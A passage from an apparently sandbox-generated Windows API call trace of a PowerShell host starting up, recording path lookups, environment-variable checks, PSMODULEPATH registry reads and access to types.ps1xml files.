	[0493.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0495.416] SetConsoleCtrlHandler (HandlerRoutine=0x29e68dc, Add=1) returned 1
	[0495.434] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0495.436] CoCreateGuid (in: pguid=0x14db50 | out: pguid=0x14db50*(Data1=0x69cf149f, Data2=0xc1e5, Data3=0x4087, Data4=([0]=0xb0, [1]=0x20, [2]=0x66, [3]=0x21, [4]=0x25, [5]=0x16, [6]=0x59, [7]=0xdb))) returned 0x0
	[0495.437] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0495.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0495.437] CoTaskMemFree (pv=0x3ada70) 
	[0496.221] WinSqmIsOptedIn () returned 0x0
	[0496.221] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.221] CoTaskMemFree (pv=0x3ada70) 
	[0496.222] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.222] CoTaskMemFree (pv=0x3ada70) 
	[0496.222] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.223] CoTaskMemFree (pv=0x3ada70) 
	[0496.223] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.223] CoTaskMemFree (pv=0x3ada70) 
	[0496.224] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.224] CoTaskMemFree (pv=0x3ada70) 
	[0496.225] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.225] CoTaskMemFree (pv=0x3ada70) 
	[0496.226] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.226] CoTaskMemFree (pv=0x3ada70) 
	[0496.226] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.226] CoTaskMemFree (pv=0x3ada70) 
	[0496.229] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.229] CoTaskMemFree (pv=0x3ada70) 
	[0496.238] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.238] CoTaskMemFree (pv=0x3ada70) 
	[0496.985] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.985] CoTaskMemFree (pv=0x3ada70) 
	[0496.986] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0496.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.986] CoTaskMemFree (pv=0x3ada70) 
	[0499.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0499.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0499.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0499.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0500.458] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0500.458] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0500.458] CoTaskMemFree (pv=0x3ada70) 
	[0500.460] CoTaskMemAlloc (cb=0xcc) returned 0x3c7c70
	[0500.460] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3c7c70, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0500.460] CoTaskMemFree (pv=0x3c7c70) 
	[0500.460] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d6c8 | out: phkResult=0x14d6c8*=0x318) returned 0x0
	[0500.460] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d64c, lpData=0x0, lpcbData=0x14d648*=0x0 | out: lpType=0x14d64c*=0x2, lpData=0x0, lpcbData=0x14d648*=0x6c) returned 0x0
	[0500.460] CoTaskMemAlloc (cb=0x70) returned 0x3702b0
	[0500.460] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d61c, lpData=0x3702b0, lpcbData=0x14d618*=0x6c | out: lpType=0x14d61c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d618*=0x6c) returned 0x0
	[0500.460] CoTaskMemFree (pv=0x3702b0) 
	[0500.460] CoTaskMemAlloc (cb=0xcc) returned 0x3c7c70
	[0500.460] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3c7c70, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0500.460] CoTaskMemFree (pv=0x3c7c70) 
	[0500.461] CoTaskMemAlloc (cb=0xcc) returned 0x3c7c70
	[0500.461] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3c7c70, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0500.461] CoTaskMemFree (pv=0x3c7c70) 
	[0500.464] RegCloseKey (hKey=0x318) returned 0x0
	[0500.465] CoTaskMemAlloc (cb=0xcc) returned 0x3c7c70
	[0500.465] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3c7c70, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0500.465] CoTaskMemFree (pv=0x3c7c70) 
	[0500.465] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d6c8 | out: phkResult=0x14d6c8*=0x318) returned 0x0
	[0500.465] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d64c, lpData=0x0, lpcbData=0x14d648*=0x0 | out: lpType=0x14d64c*=0x0, lpData=0x0, lpcbData=0x14d648*=0x0) returned 0x2
	[0500.465] RegCloseKey (hKey=0x318) returned 0x0
	[0501.143] CoTaskMemAlloc (cb=0x20c) returned 0x3b9c70
	[0501.144] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3b9c70 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0501.145] CoTaskMemFree (pv=0x3b9c70) 
	[0501.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0501.146] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0501.157] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0501.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.157] CoTaskMemFree (pv=0x3ada70) 
	[0501.159] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0501.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.159] CoTaskMemFree (pv=0x3ada70) 
	[0501.162] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0501.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.163] CoTaskMemFree (pv=0x3ada70) 
	[0501.163] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0501.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.163] CoTaskMemFree (pv=0x3ada70) 
	[0501.164] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d4b8 | out: phkResult=0x14d4b8*=0x320) returned 0x0
	[0501.165] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x14d4cc, lpData=0x0, lpcbData=0x14d4c8*=0x0 | out: lpType=0x14d4cc*=0x1, lpData=0x0, lpcbData=0x14d4c8*=0x74) returned 0x0
	[0501.166] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x14d43c, lpData=0x0, lpcbData=0x14d438*=0x0 | out: lpType=0x14d43c*=0x1, lpData=0x0, lpcbData=0x14d438*=0x74) returned 0x0
	[0501.166] CoTaskMemAlloc (cb=0x78) returned 0x3702b0
	[0501.166] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x14d40c, lpData=0x3702b0, lpcbData=0x14d408*=0x74 | out: lpType=0x14d40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d408*=0x74) returned 0x0
	[0501.166] CoTaskMemFree (pv=0x3702b0) 
	[0501.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0501.166] SetErrorMode (uMode=0x1) returned 0x1
	[0501.166] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d390 | out: lpFileInformation=0x14d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0501.166] SetErrorMode (uMode=0x1) returned 0x1
	[0501.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0501.169] SetErrorMode (uMode=0x1) returned 0x1
	[0501.169] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d390 | out: lpFileInformation=0x14d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0501.169] SetErrorMode (uMode=0x1) returned 0x1
	[0501.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0501.173] SetErrorMode (uMode=0x1) returned 0x1
	[0501.173] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d390 | out: lpFileInformation=0x14d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0501.174] SetErrorMode (uMode=0x1) returned 0x1
	[0501.177] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0501.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.178] CoTaskMemFree (pv=0x3ada70) 
	[0501.818] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0501.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.818] CoTaskMemFree (pv=0x3ada70) 
	[0501.819] GetACP () returned 0x4e4
	[0501.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0501.828] SetErrorMode (uMode=0x1) returned 0x1
	[0501.828] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
